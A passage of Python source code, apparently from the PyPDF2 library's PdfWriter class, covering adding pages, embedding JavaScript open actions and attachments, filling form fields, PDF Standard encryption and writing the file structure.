WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport codecs\nimport decimal\nimport logging\nimport random\nimport struct\nimport time\nimport uuid\nimport warnings\nfrom hashlib import md5\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union, cast\n\nfrom ._page import PageObject, _VirtualList\nfrom ._reader import PdfReader\nfrom ._security import _alg33, _alg34, _alg35\nfrom ._utils import StreamType, b_, deprecate_with_replacement\nfrom .constants import CatalogAttributes as CA\nfrom .constants import Core as CO\nfrom .constants import EncryptionDictAttributes as ED\nfrom .constants import PageAttributes as PG\nfrom .constants import PagesAttributes as PA\nfrom .constants import StreamAttributes as SA\nfrom .constants import TrailerKeys as TK\nfrom .generic import (\n ArrayObject,\n BooleanObject,\n ByteStringObject,\n ContentStream,\n DecodedStreamObject,\n Destination,\n DictionaryObject,\n FloatObject,\n IndirectObject,\n NameObject,\n NullObject,\n NumberObject,\n PdfObject,\n RectangleObject,\n StreamObject,\n TextStringObject,\n TreeObject,\n _create_bookmark,\n create_string_object,\n)\nfrom .types import (\n BookmarkTypes,\n BorderArrayType,\n FitType,\n LayoutType,\n PagemodeType,\n ZoomArgsType,\n ZoomArgType,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass PdfWriter:\n \"\"\"\n This class supports writing PDF files out, given pages produced by another\n class (typically :class:`PdfReader`).\n \"\"\"\n\n def __init__(self) -> None:\n self._header = b\"%PDF-1.3\"\n self._objects: List[Optional[PdfObject]] = [] # array of indirect objects\n self._idnum_hash: Dict[bytes, int] = {}\n\n # The root of our page tree node.\n pages = DictionaryObject()\n pages.update(\n {\n NameObject(PA.TYPE): NameObject(\"/Pages\"),\n NameObject(PA.COUNT): NumberObject(0),\n NameObject(PA.KIDS): ArrayObject(),\n }\n )\n self._pages = self._add_object(pages)\n\n # info object\n info = DictionaryObject()\n info.update(\n {\n NameObject(\"/Producer\"): create_string_object(\n codecs.BOM_UTF16_BE + \"PyPDF2\".encode(\"utf-16be\")\n )\n }\n )\n self._info = self._add_object(info)\n\n # root object\n root = DictionaryObject()\n root.update(\n {\n NameObject(PA.TYPE): NameObject(CO.CATALOG),\n NameObject(CO.PAGES): self._pages,\n }\n )\n self._root: Optional[IndirectObject] = None\n self._root_object = root\n\n def _add_object(self, obj: Optional[PdfObject]) -> IndirectObject:\n self._objects.append(obj)\n return IndirectObject(len(self._objects), 0, self)\n\n def get_object(self, ido: IndirectObject) -> PdfObject:\n if ido.pdf != self:\n raise ValueError(\"pdf must be self\")\n return self._objects[ido.idnum - 1] # type: ignore\n\n def getObject(self, ido: IndirectObject) -> PdfObject: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n            Use :meth:`get_object` instead.\n        \"\"\"\n        deprecate_with_replacement(\"getObject\", \"get_object\")\n        return self.get_object(ido)\n\n    def _add_page(\n        self, page: PageObject, action: Callable[[Any, IndirectObject], None]\n    ) -> None:\n        assert page[PA.TYPE] == CO.PAGE\n        page[NameObject(PA.PARENT)] = self._pages\n        page_ind = self._add_object(page)\n        pages = cast(DictionaryObject, self.get_object(self._pages))\n        action(pages[PA.KIDS], page_ind)\n        page_count = cast(int, pages[PA.COUNT])\n        pages[NameObject(PA.COUNT)] = NumberObject(page_count + 1)\n\n    def set_need_appearances_writer(self) -> None:\n        # See 12.7.2 and 7.7.2 for more information:\n        # http://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/PDF32000_2008.pdf\n        try:\n            catalog = self._root_object\n            # get the AcroForm tree\n            if \"/AcroForm\" not in catalog:\n                self._root_object.update(\n                    {\n                        NameObject(\"/AcroForm\"): IndirectObject(\n                            len(self._objects), 0, self\n                        )\n                    }\n                )\n\n            need_appearances = NameObject(\"/NeedAppearances\")\n            self._root_object[\"/AcroForm\"][need_appearances] = BooleanObject(True)  # type: ignore\n\n        except Exception as exc:\n            logger.error(\"set_need_appearances_writer() catch : %s\", repr(exc))\n\n    def add_page(self, page: PageObject) -> None:\n        \"\"\"\n        Add a page to this PDF file. The page is usually acquired from a\n        :class:`PdfReader` instance.\n\n        :param PageObject page: The page to add to the document. Should be\n            an instance of :class:`PageObject`\n        \"\"\"\n        self._add_page(page, list.append)\n\n    def addPage(self, page: PageObject) -> None:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :meth:`add_page` instead.\n        \"\"\"\n        deprecate_with_replacement(\"addPage\", \"add_page\")\n        self.add_page(page)\n\n    def insert_page(self, page: PageObject, index: int = 0) -> None:\n        \"\"\"\n        Insert a page in this PDF file. The page is usually acquired from a\n        :class:`PdfReader` instance.\n\n        :param PageObject page: The page to add to the document. This\n            argument should be an instance of :class:`PageObject`.\n        :param int index: Position at which the page will be inserted.\n        \"\"\"\n        self._add_page(page, lambda l, p: l.insert(index, p))\n\n    def insertPage(self, page: PageObject, index: int = 0) -> None:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :meth:`insert_page` instead.\n        \"\"\"\n        deprecate_with_replacement(\"insertPage\", \"insert_page\")\n        self.insert_page(page, index)\n\n    def get_page(\n        self, page_number: Optional[int] = None, pageNumber: Optional[int] = None\n    ) -> PageObject:\n        \"\"\"\n        Retrieve a page by number from this PDF file.\n\n        :param int page_number: The page number to retrieve\n            (pages begin at zero)\n        :return: the page at the index given by *page_number*\n        :rtype: :class:`PageObject`\n        \"\"\"\n        if pageNumber is not None:  # pragma: no cover\n            if page_number is not None:\n                raise ValueError(\"Please only use the page_number parameter\")\n            else:\n                deprecate_with_replacement(\n                    \"get_page(pageNumber)\", \"get_page(page_number)\", \"4.0.0\"\n                )\n                page_number = pageNumber\n        if page_number is None and pageNumber is None:  # pragma: no cover\n            raise ValueError(\"Please specify the page_number\")\n        pages = cast(Dict[str, Any], self.get_object(self._pages))\n        # TODO: crude hack\n        return pages[PA.KIDS][page_number].get_object()\n\n    def getPage(self, pageNumber: int) -> PageObject:  # pragma: no cover\n        \"\"\"\n        .. 
deprecated:: 1.28.0\n\n            Use :code:`writer.pages[page_number]` instead.\n        \"\"\"\n        deprecate_with_replacement(\"getPage\", \"writer.pages[page_number]\")\n        return self.get_page(pageNumber)\n\n    def _get_num_pages(self) -> int:\n        \"\"\"\n        :return: the number of pages.\n        :rtype: int\n        \"\"\"\n        pages = cast(Dict[str, Any], self.get_object(self._pages))\n        return int(pages[NameObject(\"/Count\")])\n\n    def getNumPages(self) -> int:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :code:`len(writer.pages)` instead.\n        \"\"\"\n        deprecate_with_replacement(\"getNumPages\", \"len(writer.pages)\")\n        return self._get_num_pages()\n\n    @property\n    def pages(self) -> List[PageObject]:\n        \"\"\"\n        Property that emulates a list of :class:`PageObject`\n        \"\"\"\n        return _VirtualList(self._get_num_pages, self.get_page)  # type: ignore\n\n    def add_blank_page(\n        self, width: Optional[float] = None, height: Optional[float] = None\n    ) -> PageObject:\n        \"\"\"\n        Append a blank page to this PDF file and return it. If no page size\n        is specified, use the size of the last page.\n\n        :param float width: The width of the new page expressed in default user\n            space units.\n        :param float height: The height of the new page expressed in default\n            user space units.\n        :return: the newly appended page\n        :rtype: :class:`PageObject`\n        :raises PageSizeNotDefinedError: if width and height are not defined\n            and previous page does not exist.\n        \"\"\"\n        page = PageObject.create_blank_page(self, width, height)\n        self.add_page(page)\n        return page\n\n    def addBlankPage(\n        self, width: Optional[float] = None, height: Optional[float] = None\n    ) -> PageObject:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :meth:`add_blank_page` instead.\n        \"\"\"\n        deprecate_with_replacement(\"addBlankPage\", \"add_blank_page\")\n        return self.add_blank_page(width, height)\n\n    def insert_blank_page(\n        self,\n        width: Optional[decimal.Decimal] = None,\n        height: Optional[decimal.Decimal] = None,\n        index: int = 0,\n    ) -> PageObject:\n        \"\"\"\n        Insert a blank page into this PDF file and return it. If no page size\n        is specified, use the size of the last page.\n\n        :param float width: The width of the new page expressed in default user\n            space units.\n        :param float height: The height of the new page expressed in default\n            user space units.\n        :param int index: Position to add the page.\n        :return: the newly appended page\n        :rtype: :class:`PageObject`\n        :raises PageSizeNotDefinedError: if width and height are not defined\n            and previous page does not exist.\n        \"\"\"\n        if (width is None or height is None) and (self._get_num_pages() - 1) >= index:\n            oldpage = self.pages[index]\n            width = oldpage.mediabox.width\n            height = oldpage.mediabox.height\n        page = PageObject.create_blank_page(self, width, height)\n        self.insert_page(page, index)\n        return page\n\n    def insertBlankPage(\n        self,\n        width: Optional[decimal.Decimal] = None,\n        height: Optional[decimal.Decimal] = None,\n        index: int = 0,\n    ) -> PageObject:  # pragma: no cover\n        \"\"\"\n        .. 
deprecated:: 1.28.0\n\n            Use :meth:`insert_blank_page` instead.\n        \"\"\"\n        deprecate_with_replacement(\"insertBlankPage\", \"insert_blank_page\")\n        return self.insert_blank_page(width, height, index)\n\n    def add_js(self, javascript: str) -> None:\n        \"\"\"\n        Add Javascript which will launch upon opening this PDF.\n\n        :param str javascript: Your Javascript.\n\n        >>> output.add_js(\"this.print({bUI:true,bSilent:false,bShrinkToFit:true});\")\n        # Example: This will launch the print window when the PDF is opened.\n        \"\"\"\n        js = DictionaryObject()\n        js.update(\n            {\n                NameObject(PA.TYPE): NameObject(\"/Action\"),\n                NameObject(\"/S\"): NameObject(\"/JavaScript\"),\n                NameObject(\"/JS\"): NameObject(f\"({javascript})\"),\n            }\n        )\n        js_indirect_object = self._add_object(js)\n\n        # We need a name for parameterized javascript in the pdf file, but it can be anything.\n        js_string_name = str(uuid.uuid4())\n\n        js_name_tree = DictionaryObject()\n        js_name_tree.update(\n            {\n                NameObject(\"/JavaScript\"): DictionaryObject(\n                    {\n                        NameObject(CA.NAMES): ArrayObject(\n                            [create_string_object(js_string_name), js_indirect_object]\n                        )\n                    }\n                )\n            }\n        )\n        self._add_object(js_name_tree)\n\n        self._root_object.update(\n            {\n                NameObject(\"/OpenAction\"): js_indirect_object,\n                NameObject(CA.NAMES): js_name_tree,\n            }\n        )\n\n    def addJS(self, javascript: str) -> None:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :meth:`add_js` instead.\n        \"\"\"\n        deprecate_with_replacement(\"addJS\", \"add_js\")\n        return self.add_js(javascript)\n\n    def add_attachment(self, filename: str, data: Union[str, bytes]) -> None:\n        \"\"\"\n        Embed a file inside the PDF.\n\n        :param str filename: The filename to display.\n        :param str data: The data in the file.\n\n        Reference:\n        https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/PDF32000_2008.pdf\n        Section 7.11.3\n        \"\"\"\n        # We need three entries:\n        # * The file's data\n        # * The /Filespec entry\n        # * The file's name, which goes in the Catalog\n\n        # The entry for the file\n        # Sample:\n        # 8 0 obj\n        # <<\n        #  /Length 12\n        #  /Type /EmbeddedFile\n        # >>\n        # stream\n        # Hello world!\n        # endstream\n        # endobj\n\n        file_entry = DecodedStreamObject()\n        file_entry.set_data(data)\n        file_entry.update({NameObject(PA.TYPE): NameObject(\"/EmbeddedFile\")})\n\n        # The Filespec entry\n        # Sample:\n        # 7 0 obj\n        # <<\n        #  /Type /Filespec\n        #  /F (hello.txt)\n        #  /EF << /F 8 0 R >>\n        # >>\n\n        ef_entry = DictionaryObject()\n        ef_entry.update({NameObject(\"/F\"): file_entry})\n\n        filespec = DictionaryObject()\n        filespec.update(\n            {\n                NameObject(PA.TYPE): NameObject(\"/Filespec\"),\n                NameObject(\"/F\"): create_string_object(\n                    filename\n                ),  # Perhaps also try TextStringObject\n                NameObject(\"/EF\"): ef_entry,\n            }\n        )\n\n        # Then create the entry for the root, as it needs a reference to the Filespec\n        # Sample:\n        # 1 0 obj\n        # <<\n        #  /Type /Catalog\n        #  /Outlines 2 0 R\n        #  /Pages 3 0 R\n        #  /Names << /EmbeddedFiles << /Names [(hello.txt) 7 0 R] >> >>\n        # >>\n        # endobj\n\n        embedded_files_names_dictionary = DictionaryObject()\n        embedded_files_names_dictionary.update(\n            {\n                NameObject(CA.NAMES): ArrayObject(\n                    [create_string_object(filename), filespec]\n                )\n            }\n        )\n\n        embedded_files_dictionary = DictionaryObject()\n        embedded_files_dictionary.update(\n            {NameObject(\"/EmbeddedFiles\"): embedded_files_names_dictionary}\n        )\n        # Update the root\n        self._root_object.update({NameObject(CA.NAMES): embedded_files_dictionary})\n\n    def addAttachment(\n        self, fname: str, fdata: Union[str, bytes]\n    ) -> None:  # pragma: no cover\n        \"\"\"\n        .. 
deprecated:: 1.28.0\n\n Use :meth:`add_attachment` instead.\n \"\"\"\n deprecate_with_replacement(\"addAttachment\", \"add_attachment\")\n return self.add_attachment(fname, fdata)\n\n def append_pages_from_reader(\n self,\n reader: PdfReader,\n after_page_append: Optional[Callable[[PageObject], None]] = None,\n ) -> None:\n \"\"\"\n Copy pages from reader to writer. Includes an optional callback parameter\n which is invoked after pages are appended to the writer.\n\n :param reader: a PdfReader object from which to copy page\n annotations to this writer object. The writer's annots\n will then be updated\n :callback after_page_append (function): Callback function that is invoked after\n each page is appended to the writer. Callback signature:\n :param writer_pageref (PDF page reference): Reference to the page\n appended to the writer.\n \"\"\"\n # Get page count from writer and reader\n reader_num_pages = len(reader.pages)\n writer_num_pages = len(self.pages)\n\n # Copy pages from reader to writer\n for rpagenum in range(reader_num_pages):\n reader_page = reader.pages[rpagenum]\n self.add_page(reader_page)\n writer_page = self.pages[writer_num_pages + rpagenum]\n # Trigger callback, pass writer page as parameter\n if callable(after_page_append):\n after_page_append(writer_page)\n\n def appendPagesFromReader(\n self,\n reader: PdfReader,\n after_page_append: Optional[Callable[[PageObject], None]] = None,\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`append_pages_from_reader` instead.\n \"\"\"\n deprecate_with_replacement(\"appendPagesFromReader\", \"append_pages_from_reader\")\n self.append_pages_from_reader(reader, after_page_append)\n\n def update_page_form_field_values(\n self, page: PageObject, fields: Dict[str, Any], flags: int = 0\n ) -> None:\n \"\"\"\n Update the form field values for a given page from a fields dictionary.\n Copy field texts and values from fields to page.\n If the field links to a parent object, add the information to the parent.\n\n :param page: Page reference from PDF writer where the annotations\n and field data will be updated.\n :param fields: a Python dictionary of field names (/T) and text\n values (/V)\n :param flags: An integer (0 to 7). The first bit sets ReadOnly, the\n second bit sets Required, the third bit sets NoExport. See\n PDF Reference Table 8.70 for details.\n \"\"\"\n self.set_need_appearances_writer()\n # Iterate through pages, update field values\n for j in range(len(page[PG.ANNOTS])): # type: ignore\n writer_annot = page[PG.ANNOTS][j].get_object() # type: ignore\n # retrieve parent field values, if present\n writer_parent_annot = {} # fallback if it's not there\n if PG.PARENT in writer_annot:\n writer_parent_annot = writer_annot[PG.PARENT]\n for field in fields:\n if writer_annot.get(\"/T\") == field:\n writer_annot.update(\n {NameObject(\"/V\"): TextStringObject(fields[field])}\n )\n if flags:\n writer_annot.update({NameObject(\"/Ff\"): NumberObject(flags)})\n elif writer_parent_annot.get(\"/T\") == field:\n writer_parent_annot.update(\n {NameObject(\"/V\"): TextStringObject(fields[field])}\n )\n\n def updatePageFormFieldValues(\n self, page: PageObject, fields: Dict[str, Any], flags: int = 0\n ) -> None: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n            Use :meth:`update_page_form_field_values` instead.\n        \"\"\"\n        deprecate_with_replacement(\n            \"updatePageFormFieldValues\", \"update_page_form_field_values\"\n        )\n        return self.update_page_form_field_values(page, fields, flags)\n\n    def clone_reader_document_root(self, reader: PdfReader) -> None:\n        \"\"\"\n        Copy the reader document root to the writer.\n\n        :param reader: PdfReader from which the document root should be copied.\n        \"\"\"\n        self._root_object = cast(DictionaryObject, reader.trailer[TK.ROOT])\n\n    def cloneReaderDocumentRoot(self, reader: PdfReader) -> None:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :meth:`clone_reader_document_root` instead.\n        \"\"\"\n        deprecate_with_replacement(\n            \"cloneReaderDocumentRoot\", \"clone_reader_document_root\"\n        )\n        self.clone_reader_document_root(reader)\n\n    def clone_document_from_reader(\n        self,\n        reader: PdfReader,\n        after_page_append: Optional[Callable[[PageObject], None]] = None,\n    ) -> None:\n        \"\"\"\n        Create a copy (clone) of a document from a PDF file reader.\n\n        :param reader: PDF file reader instance from which the clone\n            should be created.\n        :callback after_page_append (function): Callback function that is invoked after\n            each page is appended to the writer. Signature includes a reference to the\n            appended page (delegates to appendPagesFromReader). Callback signature:\n\n            :param writer_pageref (PDF page reference): Reference to the page just\n                appended to the document.\n        \"\"\"\n        self.clone_reader_document_root(reader)\n        self.append_pages_from_reader(reader, after_page_append)\n\n    def cloneDocumentFromReader(\n        self,\n        reader: PdfReader,\n        after_page_append: Optional[Callable[[PageObject], None]] = None,\n    ) -> None:  # pragma: no cover\n        \"\"\"\n        .. deprecated:: 1.28.0\n\n            Use :meth:`clone_document_from_reader` instead.\n        \"\"\"\n        deprecate_with_replacement(\n            \"cloneDocumentFromReader\", \"clone_document_from_reader\"\n        )\n        self.clone_document_from_reader(reader, after_page_append)\n\n    def encrypt(\n        self,\n        user_pwd: str,\n        owner_pwd: Optional[str] = None,\n        use_128bit: bool = True,\n        permissions_flag: int = -1,\n    ) -> None:\n        \"\"\"\n        Encrypt this PDF file with the PDF Standard encryption handler.\n\n        :param str user_pwd: The \"user password\", which allows for opening\n            and reading the PDF file with the restrictions provided.\n        :param str owner_pwd: The \"owner password\", which allows for\n            opening the PDF files without any restrictions. By default,\n            the owner password is the same as the user password.\n        :param bool use_128bit: flag as to whether to use 128bit\n            encryption. When false, 40bit encryption will be used. By default,\n            this flag is on.\n        :param unsigned int permissions_flag: permissions as described in\n            TABLE 3.20 of the PDF 1.7 specification. A bit value of 1 means the\n            permission is granted. 
Hence an integer value of -1 will set all\n flags.\n Bit position 3 is for printing, 4 is for modifying content, 5 and 6\n control annotations, 9 for form fields, 10 for extraction of\n text and graphics.\n \"\"\"\n if owner_pwd is None:\n owner_pwd = user_pwd\n if use_128bit:\n V = 2\n rev = 3\n keylen = int(128 / 8)\n else:\n V = 1\n rev = 2\n keylen = int(40 / 8)\n P = permissions_flag\n O = ByteStringObject(_alg33(owner_pwd, user_pwd, rev, keylen))\n ID_1 = ByteStringObject(md5(b_(repr(time.time()))).digest())\n ID_2 = ByteStringObject(md5(b_(repr(random.random()))).digest())\n self._ID = ArrayObject((ID_1, ID_2))\n if rev == 2:\n U, key = _alg34(user_pwd, O, P, ID_1)\n else:\n assert rev == 3\n U, key = _alg35(user_pwd, rev, keylen, O, P, ID_1, False)\n encrypt = DictionaryObject()\n encrypt[NameObject(SA.FILTER)] = NameObject(\"/Standard\")\n encrypt[NameObject(\"/V\")] = NumberObject(V)\n if V == 2:\n encrypt[NameObject(SA.LENGTH)] = NumberObject(keylen * 8)\n encrypt[NameObject(ED.R)] = NumberObject(rev)\n encrypt[NameObject(ED.O)] = ByteStringObject(O)\n encrypt[NameObject(ED.U)] = ByteStringObject(U)\n encrypt[NameObject(ED.P)] = NumberObject(P)\n self._encrypt = self._add_object(encrypt)\n self._encrypt_key = key\n\n def write(self, stream: StreamType) -> None:\n \"\"\"\n Write the collection of pages added to this object out as a PDF file.\n\n :param stream: An object to write the file to. The object must support\n the write method and the tell method, similar to a file object.\n \"\"\"\n if hasattr(stream, \"mode\") and \"b\" not in stream.mode:\n warnings.warn(\n f\"File <{stream.name}> to write to is not in binary mode. \" # type: ignore\n \"It may not be written to correctly.\"\n )\n\n if not self._root:\n self._root = self._add_object(self._root_object)\n\n external_reference_map: Dict[Any, Any] = {}\n\n # PDF objects sometimes have circular references to their /Page objects\n # inside their object tree (for example, annotations). Those will be\n # indirect references to objects that we've recreated in this PDF. To\n # address this problem, PageObject's store their original object\n # reference number, and we add it to the external reference map before\n # we sweep for indirect references. 
\n def write(self, stream: StreamType) -> None:\n \"\"\"\n Write the collection of pages added to this object out as a PDF file.\n\n :param stream: An object to write the file to. The object must support\n the write method and the tell method, similar to a file object.\n \"\"\"\n if hasattr(stream, \"mode\") and \"b\" not in stream.mode:\n warnings.warn(\n f\"File <{stream.name}> to write to is not in binary mode. \" # type: ignore\n \"It may not be written to correctly.\"\n )\n\n if not self._root:\n self._root = self._add_object(self._root_object)\n\n external_reference_map: Dict[Any, Any] = {}\n\n # PDF objects sometimes have circular references to their /Page objects\n # inside their object tree (for example, annotations). Those will be\n # indirect references to objects that we've recreated in this PDF. To\n # address this problem, PageObject's store their original object\n # reference number, and we add it to the external reference map before\n # we sweep for indirect references. This forces self-page-referencing\n # trees to reference the correct new object location, rather than\n # copying in a new copy of the page object.\n for obj_index, obj in enumerate(self._objects):\n if isinstance(obj, PageObject) and obj.indirect_ref is not None:\n data = obj.indirect_ref\n if data.pdf not in external_reference_map:\n external_reference_map[data.pdf] = {}\n if data.generation not in external_reference_map[data.pdf]:\n external_reference_map[data.pdf][data.generation] = {}\n external_reference_map[data.pdf][data.generation][\n data.idnum\n ] = IndirectObject(obj_index + 1, 0, self)\n\n self.stack: List[int] = []\n self._sweep_indirect_references(external_reference_map, self._root)\n del self.stack\n\n object_positions = self._write_header(stream)\n xref_location = self._write_xref_table(stream, object_positions)\n self._write_trailer(stream)\n stream.write(b_(f\"\\nstartxref\\n{xref_location}\\n%%EOF\\n\")) # eof\n\n def _write_header(self, stream: StreamType) -> List[int]:\n object_positions = []\n stream.write(self._header + b\"\\n\")\n stream.write(b\"%\\xE2\\xE3\\xCF\\xD3\\n\")\n for i, obj in enumerate(self._objects):\n obj = self._objects[i]\n # If the obj is None we can't write anything\n if obj is not None:\n idnum = i + 1\n object_positions.append(stream.tell())\n stream.write(b_(str(idnum)) + b\" 0 obj\\n\")\n key = None\n if hasattr(self, \"_encrypt\") and idnum != self._encrypt.idnum:\n pack1 = struct.pack(\"<i\", i + 1)[:3]\n pack2 = struct.pack(\"<i\", 0)[:2]\n key = self._encrypt_key + pack1 + pack2\n assert len(key) == (len(self._encrypt_key) + 5)\n md5_hash = md5(key).digest()\n key = md5_hash[: min(16, len(self._encrypt_key) + 5)]\n obj.write_to_stream(stream, key)\n stream.write(b_(\"\\nendobj\\n\"))\n return object_positions\n\n def _write_xref_table(\n self, stream: StreamType, object_positions: List[int]\n ) -> int:\n xref_location = stream.tell()\n stream.write(b\"xref\\n\")\n stream.write(b_(f\"0 {len(self._objects) + 1}\\n\"))\n stream.write(b_(f\"{0:0>10} {65535:0>5} f \\n\"))\n for offset in object_positions:\n stream.write(b_(f\"{offset:0>10} {0:0>5} n \\n\"))\n return xref_location\n\n def _write_trailer(self, stream: StreamType) -> None:\n stream.write(b\"trailer\\n\")\n trailer = DictionaryObject()\n trailer.update(\n {\n NameObject(TK.SIZE): NumberObject(len(self._objects) + 1),\n NameObject(TK.ROOT): self._root,\n NameObject(TK.INFO): self._info,\n }\n )\n if hasattr(self, \"_ID\"):\n trailer[NameObject(TK.ID)] = self._ID\n if hasattr(self, \"_encrypt\"):\n trailer[NameObject(TK.ENCRYPT)] = self._encrypt\n trailer.write_to_stream(stream, None)\n\n def add_metadata(self, infos: Dict[str, Any]) -> None:\n \"\"\"\n Add custom metadata to the output.\n\n :param dict infos: a Python dictionary where each key is a field\n and each value is your new metadata.\n \"\"\"\n args = {}\n for key, value in list(infos.items()):\n args[NameObject(key)] = create_string_object(value)\n self.get_object(self._info).update(args) # type: ignore\n\n def addMetadata(self, infos: Dict[str, Any]) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_metadata` instead.\n \"\"\"\n deprecate_with_replacement(\"addMetadata\", \"add_metadata\")\n self.add_metadata(infos)\n\n def _sweep_indirect_references(\n self,\n extern_map: Dict[Any, Any],\n data: Union[\n ArrayObject,\n BooleanObject,\n DictionaryObject,\n FloatObject,\n IndirectObject,\n NameObject,\n PdfObject,\n NumberObject,\n TextStringObject,\n NullObject,\n ],\n ) -> Union[Any, StreamObject]:\n if isinstance(data, DictionaryObject):\n for key, value in list(data.items()):\n value = self._sweep_indirect_references(extern_map, value)\n if isinstance(value, StreamObject):\n # a dictionary value is a stream. 
streams must be indirect\n # objects, so we need to change this value.\n value = self._add_object(value)\n data[key] = value\n return data\n elif isinstance(data, ArrayObject):\n for i in range(len(data)):\n value = self._sweep_indirect_references(extern_map, data[i])\n if isinstance(value, StreamObject):\n # an array value is a stream. streams must be indirect\n # objects, so we need to change this value\n value = self._add_object(value)\n data[i] = value\n return data\n elif isinstance(data, IndirectObject):\n # internal indirect references are fine\n if data.pdf == self:\n if data.idnum in self.stack:\n return data\n else:\n self.stack.append(data.idnum)\n realdata = self.get_object(data)\n self._sweep_indirect_references(extern_map, realdata)\n return data\n else:\n if hasattr(data.pdf, \"stream\") and data.pdf.stream.closed:\n raise ValueError(\n f\"I/O operation on closed file: {data.pdf.stream.name}\"\n )\n newobj = (\n extern_map.get(data.pdf, {})\n .get(data.generation, {})\n .get(data.idnum, None)\n )\n if newobj is None:\n try:\n newobj = data.pdf.get_object(data)\n hash_value = None\n if newobj is not None:\n hash_value = newobj.hash_value()\n # Check if object is already added to pdf.\n if hash_value in self._idnum_hash:\n return IndirectObject(self._idnum_hash[hash_value], 0, self)\n self._objects.append(None) # placeholder\n idnum = len(self._objects)\n if hash_value is not None:\n self._idnum_hash[hash_value] = idnum\n newobj_ido = IndirectObject(idnum, 0, self)\n if data.pdf not in extern_map:\n extern_map[data.pdf] = {}\n if data.generation not in extern_map[data.pdf]:\n extern_map[data.pdf][data.generation] = {}\n extern_map[data.pdf][data.generation][data.idnum] = newobj_ido\n newobj = self._sweep_indirect_references(extern_map, newobj)\n self._objects[idnum - 1] = newobj\n return newobj_ido\n except (ValueError, RecursionError):\n # Unable to resolve the Object, returning NullObject instead.\n warnings.warn(\n f\"Unable to resolve [{data.__class__.__name__}: {data}], \"\n \"returning NullObject instead\"\n )\n return NullObject()\n return newobj\n else:\n return data\n\n def get_reference(self, obj: PdfObject) -> IndirectObject:\n idnum = self._objects.index(obj) + 1\n ref = IndirectObject(idnum, 0, self)\n assert ref.get_object() == obj\n return ref\n\n def getReference(self, obj: PdfObject) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`get_reference` instead.\n \"\"\"\n deprecate_with_replacement(\"getReference\", \"get_reference\")\n return self.get_reference(obj)\n\n def get_outline_root(self) -> TreeObject:\n if CO.OUTLINES in self._root_object:\n # TABLE 3.25 Entries in the catalog dictionary\n outline = cast(TreeObject, self._root_object[CO.OUTLINES])\n idnum = self._objects.index(outline) + 1\n outline_ref = IndirectObject(idnum, 0, self)\n assert outline_ref.get_object() == outline\n else:\n outline = TreeObject()\n outline.update({})\n outline_ref = self._add_object(outline)\n self._root_object[NameObject(CO.OUTLINES)] = outline_ref\n\n return outline\n\n def getOutlineRoot(self) -> TreeObject: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n Use :meth:`get_outline_root` instead.\n \"\"\"\n deprecate_with_replacement(\"getOutlineRoot\", \"get_outline_root\")\n return self.get_outline_root()\n\n def get_named_dest_root(self) -> ArrayObject:\n if CA.NAMES in self._root_object and isinstance(\n self._root_object[CA.NAMES], DictionaryObject\n ):\n names = cast(DictionaryObject, self._root_object[CA.NAMES])\n idnum = self._objects.index(names) + 1\n names_ref = IndirectObject(idnum, 0, self)\n assert names_ref.get_object() == names\n if CA.DESTS in names and isinstance(names[CA.DESTS], DictionaryObject):\n # 3.6.3 Name Dictionary (PDF spec 1.7)\n dests = cast(DictionaryObject, names[CA.DESTS])\n idnum = self._objects.index(dests) + 1\n dests_ref = IndirectObject(idnum, 0, self)\n assert dests_ref.get_object() == dests\n if CA.NAMES in dests:\n # TABLE 3.33 Entries in a name tree node dictionary\n nd = cast(ArrayObject, dests[CA.NAMES])\n else:\n nd = ArrayObject()\n dests[NameObject(CA.NAMES)] = nd\n else:\n dests = DictionaryObject()\n dests_ref = self._add_object(dests)\n names[NameObject(CA.DESTS)] = dests_ref\n nd = ArrayObject()\n dests[NameObject(CA.NAMES)] = nd\n\n else:\n names = DictionaryObject()\n names_ref = self._add_object(names)\n self._root_object[NameObject(CA.NAMES)] = names_ref\n dests = DictionaryObject()\n dests_ref = self._add_object(dests)\n names[NameObject(CA.DESTS)] = dests_ref\n nd = ArrayObject()\n dests[NameObject(CA.NAMES)] = nd\n\n return nd\n\n def getNamedDestRoot(self) -> ArrayObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`get_named_dest_root` instead.\n \"\"\"\n deprecate_with_replacement(\"getNamedDestRoot\", \"get_named_dest_root\")\n return self.get_named_dest_root()\n\n def add_bookmark_destination(\n self, dest: PageObject, parent: Optional[TreeObject] = None\n ) -> IndirectObject:\n dest_ref = self._add_object(dest)\n\n outline_ref = self.get_outline_root()\n\n if parent is None:\n parent = outline_ref\n\n parent = 